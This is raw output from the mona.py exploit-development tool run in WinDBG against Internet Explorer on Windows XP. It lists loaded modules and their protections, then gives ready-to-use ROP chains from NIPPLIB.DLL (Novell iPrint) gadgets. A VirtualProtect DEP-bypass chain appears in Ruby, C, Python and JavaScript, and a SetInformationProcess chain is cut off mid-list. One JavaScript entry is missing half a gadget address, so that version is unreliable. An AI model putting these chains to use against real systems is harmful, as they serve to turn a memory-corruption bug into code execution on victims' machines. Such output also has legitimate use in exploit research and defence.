================================================================================
  Output generated by mona.py v2.0, rev 494 - WinDBG
  Corelan Team - https://www.corelan.be
================================================================================
  OS : xp, release 5.1.2600
  Process being debugged : iexplore (pid 2780)
  Current mona arguments: rop -m nipplib.dll
================================================================================
  2015-02-24 18:36:08
================================================================================
----------------------------------------------------------------------------------------------------------------------------------
 Module info :
----------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
 0x6d3e0000 | 0x6d3f0000 | 0x00010000 | False  | True    | False |  False   | False  | 10.3.0.5 [jp2ssv.dll] (C:\Program Files\Java\jre7\bin\jp2ssv.dll)
 0x722b0000 | 0x722b5000 | 0x00005000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [sensapi.dll] (C:\WINDOWS\system32\sensapi.dll)
 0x74980000 | 0x74aa3000 | 0x00123000 | False  | True    | False |  False   | True   | 8.100.1051.0 [msxml3.dll] (C:\WINDOWS\system32\msxml3.dll)
 0x72d20000 | 0x72d29000 | 0x00009000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [wdmaud.drv] (C:\WINDOWS\system32\wdmaud.drv)
 0x77b20000 | 0x77b32000 | 0x00012000 | False  | True    | False |  False   | True   | 5.1.2600.5875 [MSASN1.dll] (C:\WINDOWS\system32\MSASN1.dll)
 0x03380000 | 0x033a9000 | 0x00029000 | True   | True    | False |  False   | True   | 3.10.349.0 [msls31.dll] (C:\WINDOWS\system32\msls31.dll)
 0x1b000000 | 0x1b00c000 | 0x0000c000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [ImgUtil.dll] (C:\WINDOWS\system32\ImgUtil.dll)
 0x68100000 | 0x68126000 | 0x00026000 | False  | True    | False |  False   | True   | 5.1.2600.5507 [dssenh.dll] (C:\WINDOWS\system32\dssenh.dll)
 0x5dca0000 | 0x5de88000 | 0x001e8000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [iertutil.dll] (C:\WINDOWS\system32\iertutil.dll)
 0x10000000 | 0x10011000 | 0x00011000 | False  | True    | False |  False   | False  | 9.5.0.270 [AcroIEHelperShim.dll] (C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll)
 0x774e0000 | 0x7761d000 | 0x0013d000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ole32.dll] (C:\WINDOWS\system32\ole32.dll)
 0x77f60000 | 0x77fd6000 | 0x00076000 | False  | True    | False |  False   | True   | 6.0.2900.5912 [SHLWAPI.dll] (C:\WINDOWS\system32\SHLWAPI.dll)
 0x71ab0000 | 0x71ac7000 | 0x00017000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ws2_32.dll] (C:\WINDOWS\system32\ws2_32.dll)
 0x7e410000 | 0x7e4a1000 | 0x00091000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [USER32.dll] (C:\WINDOWS\system32\USER32.dll)
 0x71b20000 | 0x71b32000 | 0x00012000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [MPR.dll] (C:\WINDOWS\system32\MPR.dll)
 0x77bd0000 | 0x77bd7000 | 0x00007000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [midimap.dll] (C:\WINDOWS\system32\midimap.dll)
 0x6d430000 | 0x6d43a000 | 0x0000a000 | False  | True    | False |  False   | True   | 5.3.2600.5512 [ddrawex.dll] (C:\WINDOWS\system32\ddrawex.dll)
 0x7c420000 | 0x7c4a7000 | 0x00087000 | False  | True    | False |  False   | True   | 8.0.50727.762 [MSVCP80.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll)
 0x7c9c0000 | 0x7d1d7000 | 0x00817000 | False  | True    | False |  False   | True   | 6.0.2900.5622 [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)
 0x71d40000 | 0x71d5b000 | 0x0001b000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [ACTXPRXY.DLL] (C:\WINDOWS\system32\ACTXPRXY.DLL)
 0x76f20000 | 0x76f47000 | 0x00027000 | False  | True    | False |  False   | True   | 5.1.2600.5625 [DNSAPI.dll] (C:\WINDOWS\system32\DNSAPI.dll)
 0x77050000 | 0x77115000 | 0x000c5000 | False  | True    | False |  False   | True   | 2001.12.4414.700 [COMRes.dll] (C:\WINDOWS\system32\COMRes.dll)
 0x5edd0000 | 0x5ede7000 | 0x00017000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [OLEPRO32.DLL] (C:\WINDOWS\system32\OLEPRO32.DLL)
 0x76d60000 | 0x76d79000 | 0x00019000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [iphlpapi.dll] (C:\WINDOWS\system32\iphlpapi.dll)
 0x71a50000 | 0x71a8f000 | 0x0003f000 | False  | True    | False |  False   | True   | 5.1.2600.5625 [mswsock.dll] (C:\WINDOWS\system32\mswsock.dll)
 0x76b40000 | 0x76b6d000 | 0x0002d000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WINMM.dll] (C:\WINDOWS\system32\WINMM.dll)
 0x77b40000 | 0x77b62000 | 0x00022000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [appHelp.dll] (C:\WINDOWS\system32\appHelp.dll)
 0x35cb0000 | 0x35d07000 | 0x00057000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [Dxtmsft.dll] (C:\WINDOWS\system32\Dxtmsft.dll)
 0x71590000 | 0x71609000 | 0x00079000 | False  | True    | False |  False   | True   | 5.1.2600.5906 [AcLayers.DLL] (C:\WINDOWS\AppPatch\AcLayers.DLL)
 0x1a400000 | 0x1a532000 | 0x00132000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [urlmon.dll] (C:\WINDOWS\system32\urlmon.dll)
 0x63580000 | 0x63b2c000 | 0x005ac000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [mshtml.dll] (C:\WINDOWS\system32\mshtml.dll)
 0x73bc0000 | 0x73bc6000 | 0x00006000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [DCIMAN32.dll] (C:\WINDOWS\system32\DCIMAN32.dll)
 0x7c800000 | 0x7c8f6000 | 0x000f6000 | False  | True    | False |  False   | True   | 5.1.2600.5781 [kernel32.dll] (C:\WINDOWS\system32\kernel32.dll)
 0x7c900000 | 0x7c9b2000 | 0x000b2000 | False  | True    | False |  False   | True   | 5.1.2600.5755 [ntdll.dll] (C:\WINDOWS\system32\ntdll.dll)
 0x009c0000 | 0x009c6000 | 0x00006000 | True   | True    | False |  False   | False  | 8.0.6001.18702 [xpshims.dll] (C:\Program Files\Internet Explorer\xpshims.dll)
 0x03a70000 | 0x03a9f000 | 0x0002f000 | True   | True    | False |  False   | True   | 8.0.6001.18702 [iepeers.dll] (C:\WINDOWS\system32\iepeers.dll)
 0x63000000 | 0x630e6000 | 0x000e6000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [WININET.dll] (C:\WINDOWS\system32\WININET.dll)
 0x75cf0000 | 0x75d81000 | 0x00091000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [MLANG.dll] (C:\WINDOWS\system32\MLANG.dll)
 0x76bf0000 | 0x76bfb000 | 0x0000b000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [PSAPI.DLL] (C:\WINDOWS\system32\PSAPI.DLL)
 0x662b0000 | 0x66308000 | 0x00058000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [hnetcfg.dll] (C:\WINDOWS\system32\hnetcfg.dll)
 0x02b40000 | 0x02b50000 | 0x00010000 | True   | True    | False |  False   | False  | 9.5.0.270 [AcroIEHelper.dll] (C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll)
 0x763b0000 | 0x763f9000 | 0x00049000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [comdlg32.dll] (C:\WINDOWS\system32\comdlg32.dll)
 0x76d40000 | 0x76d58000 | 0x00018000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [MPRAPI.dll] (C:\WINDOWS\system32\MPRAPI.dll)
 0x76e80000 | 0x76e8e000 | 0x0000e000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [rtutils.dll] (C:\WINDOWS\system32\rtutils.dll)
 0x76ee0000 | 0x76f1c000 | 0x0003c000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [RASAPI32.dll] (C:\WINDOWS\system32\RASAPI32.dll)
 0x76e90000 | 0x76ea2000 | 0x00012000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [rasman.dll] (C:\WINDOWS\system32\rasman.dll)
 0x76790000 | 0x7679c000 | 0x0000c000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [cryptdll.dll] (C:\WINDOWS\system32\cryptdll.dll)
 0x773d0000 | 0x774d3000 | 0x00103000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [comctl32.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
 0x755c0000 | 0x755ee000 | 0x0002e000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [msctfime.ime] (C:\WINDOWS\system32\msctfime.ime)
 0x74720000 | 0x7476c000 | 0x0004c000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [MSCTF.dll] (C:\WINDOWS\system32\MSCTF.dll)
 0x77c00000 | 0x77c08000 | 0x00008000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [VERSION.dll] (C:\WINDOWS\system32\VERSION.dll)
 0x77f10000 | 0x77f59000 | 0x00049000 | False  | True    | False |  False   | True   | 5.1.2600.5698 [GDI32.dll] (C:\WINDOWS\system32\GDI32.dll)
 0x5ad70000 | 0x5ada8000 | 0x00038000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [uxtheme.dll] (C:\WINDOWS\system32\uxtheme.dll)
 0x73000000 | 0x73026000 | 0x00026000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WINSPOOL.DRV] (C:\WINDOWS\system32\WINSPOOL.DRV)
 0x04720000 | 0x04779000 | 0x00059000 | True   | True    | False |  False   | True   | 5.1.2600.5727 [WINHTTP.dll] (C:\WINDOWS\system32\WINHTTP.dll)
 0x5cb70000 | 0x5cb96000 | 0x00026000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ShimEng.dll] (C:\WINDOWS\system32\ShimEng.dll)
 0x77a80000 | 0x77b15000 | 0x00095000 | False  | True    | False |  False   | True   | 5.131.2600.5512 [CRYPT32.dll] (C:\WINDOWS\system32\CRYPT32.dll)
 0x77c10000 | 0x77c68000 | 0x00058000 | False  | True    | False |  False   | True   | 7.0.2600.5512 [msvcrt.dll] (C:\WINDOWS\system32\msvcrt.dll)
 0x76380000 | 0x76385000 | 0x00005000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [msimg32.dll] (C:\WINDOWS\system32\msimg32.dll)
 0x05040000 | 0x0508a000 | 0x0004a000 | True   | False   | False |  False   | True   | 5.5.2.0 [nipplibr.dll] (C:\WINDOWS\system32\iprint\nls\deu\nipplibr.dll)
 0x5c000000 | 0x5c189000 | 0x00189000 | False  | False   | False |  False   | True   | 5.5.2.0 [NIPPLIB.DLL] (C:\WINDOWS\system32\NIPPLIB.DLL)
 0x767f0000 | 0x76818000 | 0x00028000 | False  | True    | False |  False   | True   | 5.1.2600.5834 [schannel.dll] (C:\WINDOWS\system32\schannel.dll)
 0x73760000 | 0x737ab000 | 0x0004b000 | False  | True    | False |  False   | True   | 5.3.2600.5512 [DDRAW.dll] (C:\WINDOWS\system32\DDRAW.dll)
 0x71aa0000 | 0x71aa8000 | 0x00008000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WS2HELP.dll] (C:\WINDOWS\system32\WS2HELP.dll)
 0x769c0000 | 0x76a74000 | 0x000b4000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [USERENV.dll] (C:\WINDOWS\system32\USERENV.dll)
 0x72d10000 | 0x72d18000 | 0x00008000 | False  | False   | False |  False   | True   | 5.1.2600.0 [msacm32.drv] (C:\WINDOWS\system32\msacm32.drv)
 0x76e10000 | 0x76e35000 | 0x00025000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [adsldpc.dll] (C:\WINDOWS\system32\adsldpc.dll)
 0x63380000 | 0x63434000 | 0x000b4000 | False  | True    | False |  False   | True   | 5.8.6001.18702 [jscript.dll] (C:\WINDOWS\system32\jscript.dll)
 0x72ea0000 | 0x72f0f000 | 0x0006f000 | False  | True    | False |  False   | True   | 8.0.6001.18669 [ieapfltr.dll] (C:\WINDOWS\system32\ieapfltr.dll)
 0x47060000 | 0x47081000 | 0x00021000 | False  | True    | False |  False   | True   | 1.0.1018.0 [XmlLite.dll] (C:\WINDOWS\system32\XmlLite.dll)
 0x5b860000 | 0x5b8b5000 | 0x00055000 | False  | True    | False |  False   | True   | 5.1.2600.5694 [NETAPI32.dll] (C:\WINDOWS\system32\NETAPI32.dll)
 0x78130000 | 0x781cb000 | 0x0009b000 | False  | True    | False |  False   | True   | 8.0.50727.762 [MSVCR80.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll)
 0x72d10000 | 0x72d18000 | 0x00008000 | False  | False   | False |  False   | True   | 5.1.2600.0 [MSACM32.dll] (C:\WINDOWS\system32\msacm32.drv)
 0x76f60000 | 0x76f8c000 | 0x0002c000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WLDAP32.dll] (C:\WINDOWS\system32\WLDAP32.dll)
 0x7e720000 | 0x7e7d0000 | 0x000b0000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SXS.DLL] (C:\WINDOWS\system32\SXS.DLL)
 0x77c70000 | 0x77c95000 | 0x00025000 | False  | True    | False |  False   | True   | 5.1.2600.5876 [msv1_0.dll] (C:\WINDOWS\system32\msv1_0.dll)
 0x00400000 | 0x0049c000 | 0x0009c000 | False  | True    | False |  False   | False  | 8.0.6001.18702 [iexplore.exe] (C:\Program Files\Internet Explorer\iexplore.exe)
 0x35c50000 | 0x35c89000 | 0x00039000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [Dxtrans.dll] (C:\WINDOWS\system32\Dxtrans.dll)
 0x77dd0000 | 0x77e6b000 | 0x0009b000 | False  | True    | False |  False   | True   | 5.1.2600.5755 [ADVAPI32.dll] (C:\WINDOWS\system32\ADVAPI32.dll)
 0x77920000 | 0x77a13000 | 0x000f3000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SETUPAPI.dll] (C:\WINDOWS\system32\SETUPAPI.dll)
 0x78aa0000 | 0x78b5e000 | 0x000be000 | False  | True    | False |  False   | False  | 10.0.30319.1 [MSVCR100.dll] (C:\Program Files\Java\jre7\bin\MSVCR100.dll)
 0x76eb0000 | 0x76edf000 | 0x0002f000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [TAPI32.dll] (C:\WINDOWS\system32\TAPI32.dll)
 0x00c30000 | 0x016c1000 | 0x00a91000 | True   | True    | False |  False   | True   | 8.0.6001.18702 [IEFRAME.dll] (C:\WINDOWS\system32\IEFRAME.dll)
 0x76c30000 | 0x76c5e000 | 0x0002e000 | False  | True    | False |  False   | True   | 5.131.2600.5922 [wintrust.dll] (C:\WINDOWS\system32\wintrust.dll)
 0x020e0000 | 0x023a5000 | 0x002c5000 | True   | True    | False |  False   | True   | 5.1.2600.5512 [xpsp2res.dll] (C:\WINDOWS\system32\xpsp2res.dll)
 0x71bf0000 | 0x71c03000 | 0x00013000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SAMLIB.dll] (C:\WINDOWS\system32\SAMLIB.dll)
 0x71a90000 | 0x71a98000 | 0x00008000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [wshtcpip.dll] (C:\WINDOWS\System32\wshtcpip.dll)
 0x75e60000 | 0x75e73000 | 0x00013000 | False  | True    | False |  False   | True   | 5.131.2600.5512 [cryptnet.dll] (C:\WINDOWS\system32\cryptnet.dll)
 0x76fc0000 | 0x76fc6000 | 0x00006000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [rasadhlp.dll] (C:\WINDOWS\system32\rasadhlp.dll)
 0x77fe0000 | 0x77ff1000 | 0x00011000 | False  | True    | False |  False   | True   | 5.1.2600.5834 [Secur32.dll] (C:\WINDOWS\system32\Secur32.dll)
 0x04bb0000 | 0x04c2b000 | 0x0007b000 | True   | False   | False |  False   | True   | 5.5.2.0 [ienipp.ocx] (C:\WINDOWS\system32\ienipp.ocx)
 0x76c90000 | 0x76cb8000 | 0x00028000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [IMAGEHLP.dll] (C:\WINDOWS\system32\IMAGEHLP.dll)
 0x68000000 | 0x68036000 | 0x00036000 | False  | True    | False |  False   | True   | 5.1.2600.5507 [rsaenh.dll] (C:\WINDOWS\system32\rsaenh.dll)
 0x746f0000 | 0x7471a000 | 0x0002a000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [msimtf.dll] (C:\WINDOWS\system32\msimtf.dll)
 0x77120000 | 0x771ab000 | 0x0008b000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [OLEAUT32.dll] (C:\WINDOWS\system32\OLEAUT32.dll)
 0x77e70000 | 0x77f02000 | 0x00092000 | False  | True    | False |  False   | True   | 5.1.2600.5795 [RPCRT4.dll] (C:\WINDOWS\system32\RPCRT4.dll)
 0x76b20000 | 0x76b31000 | 0x00011000 | False  | True    | False |  False   | True   | 3.5.2284.2 [ATL.DLL] (C:\WINDOWS\system32\ATL.DLL)
 0x76fd0000 | 0x7704f000 | 0x0007f000 | False  | True    | False |  False   | True   | 2001.12.4414.700 [CLBCATQ.DLL] (C:\WINDOWS\system32\CLBCATQ.DLL)
 0x76390000 | 0x763ad000 | 0x0001d000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [IMM32.DLL] (C:\WINDOWS\system32\IMM32.DLL)
 0x742e0000 | 0x742f5000 | 0x00015000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SPOOLSS.DLL] (C:\WINDOWS\system32\SPOOLSS.DLL)
 0x77cc0000 | 0x77cf2000 | 0x00032000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ACTIVEDS.dll] (C:\WINDOWS\system32\ACTIVEDS.dll)
 0x1b060000 | 0x1b06e000 | 0x0000e000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [pngfilt.dll] (C:\WINDOWS\system32\pngfilt.dll)
 0x02710000 | 0x02719000 | 0x00009000 | True   | True    | False |  False   | True   | 6.0.5441.0 [Normaliz.dll] (C:\WINDOWS\system32\Normaliz.dll)
 0x025c0000 | 0x02600000 | 0x00040000 | True   | True    | False |  False   | False  | 8.0.6001.18702 [IEPROXY.DLL] (C:\Program Files\Internet Explorer\IEPROXY.DLL)
----------------------------------------------------------------------------------------------------------------------------------

################################################################################

Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = tr to &VirtualProtect()
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x5c0bcf4f,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c0bcf4f,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c075d58,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000201,  # 0x00000201-> ebx
      0x5c09b652,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000040,  # 0x00000040-> edx
      0x5c0b9cfc,  # XOR EDX,EDX # RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  # Filler (compensate)
      0x5c098b62,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x5c0e52b5,  # &Writable location [NIPPLIB.DLL]
      0x5c0a361b,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c066991,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c004277,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c06d993,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x749811a0,  # ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c0635b2,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x5c0bcf4f,  // POP EBP // RETN [NIPPLIB.DLL] 
      0x5c0bcf4f,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c075d58,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x00000201,  // 0x00000201-> ebx
      0x5c09b652,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x00000040,  // 0x00000040-> edx
      0x5c0b9cfc,  // XOR EDX,EDX // RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  // ADD EDX,EBX // POP EBX // RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  // Filler (compensate)
      0x5c098b62,  // POP ECX // RETN [NIPPLIB.DLL] 
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x5c0e52b5,  // &Writable location [NIPPLIB.DLL]
      0x5c0a361b,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c075142,  // RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c066991,  // POP ESI // RETN [NIPPLIB.DLL] 
      0x5c004277,  // JMP [EAX] [NIPPLIB.DLL]
      0x5c06d993,  // POP EAX // RETN [NIPPLIB.DLL] 
      0x749811a0,  // ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
      0x5c0839ac,  // PUSHAD // RETN [NIPPLIB.DLL] 
      0x5c0635b2,  // ptr to 'push esp // ret ' [NIPPLIB.DLL]
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x5c0bcf4f,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c0bcf4f,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c075d58,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000201,  # 0x00000201-> ebx
      0x5c09b652,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000040,  # 0x00000040-> edx
      0x5c0b9cfc,  # XOR EDX,EDX # RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  # Filler (compensate)
      0x5c098b62,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x5c0e52b5,  # &Writable location [NIPPLIB.DLL]
      0x5c0a361b,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c066991,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c004277,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c06d993,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x749811a0,  # ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c0635b2,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%ucf4f%u5c0b" + // 0x5c0bcf4f : ,# POP EBP # RETN [NIPPLIB.DLL] 
    "%ucf4f%u5c0b" + // 0x5c0bcf4f : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u5d58%u5c07" + // 0x5c075d58 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
    "%ub652%u5c09" + // 0x5c09b652 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
    "%u9cfc%u5c0b" + // 0x5c0b9cfc : ,# XOR EDX,EDX # RETN [NIPPLIB.DLL] 
    "%u9c9e%u5c0b" + // 0x5c0b9c9e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
    "%u8b62%u5c09" + // 0x5c098b62 : ,# POP ECX # RETN [NIPPLIB.DLL] 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u52b5%u5c0e" + // 0x5c0e52b5 : ,# &Writable location [NIPPLIB.DLL]
    "%u361b" + // 0x5c0a361b : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u5142%u5c07" + // 0x5c075142 : ,# RETN (ROP NOP) [NIPPLIB.DLL]
    "%u6991%u5c06" + // 0x5c066991 : ,# POP ESI # RETN [NIPPLIB.DLL] 
    "%u4277%u5c00" + // 0x5c004277 : ,# JMP [EAX] [NIPPLIB.DLL]
    "%ud993%u5c06" + // 0x5c06d993 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%u11a0%u7498" + // 0x749811a0 : ,# ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
    "%u39ac%u5c08" + // 0x5c0839ac : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    "%u35b2%u5c06" + // 0x5c0635b2 : ,# ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for SetInformationProcess() :
--------------------------------------------
 EAX = SizeOf(ExecuteFlags) (0x4)
 ECX = &ExecuteFlags (ptr to 0x00000002)
 EDX = ProcessExecuteFlags (0x22)
 EBX = NtCurrentProcess (0xffffffff)
 ESP = ReturnTo (automatic)
 EBP = ptr to NtSetInformationProcess()
 ESI = <not used>
 EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------


ROP Chain for SetInformationProcess() [(XP/2003 Server only)] :
---------------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x00000000,  # [-] Unable to find gadgets to pickup the desired API pointer into ebp
      0x00000000,  # [-] Unable to find ptr to &SetInformationProcess()
      0x5c088ca6,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000022,  # 0x00000022-> edx
      0x5c0b9cdc,  # XOR EDX,EDX # RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  # Filler (compensate)
      0x5c07cb4e,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x5c00015c,  # &0x00000002 [NIPPLIB.DLL]
      0x5c06bc7d,  # POP EBX # RETN [NIPPLIB.DLL] 
      0xffffffff,  # 0xffffffff-> ebx
      0x5c049ea8,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x00000004,  # 0x00000004-> eax
      0x5c075ffc,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075ffc,  # skip 4 bytes [NIPPLIB.DLL]
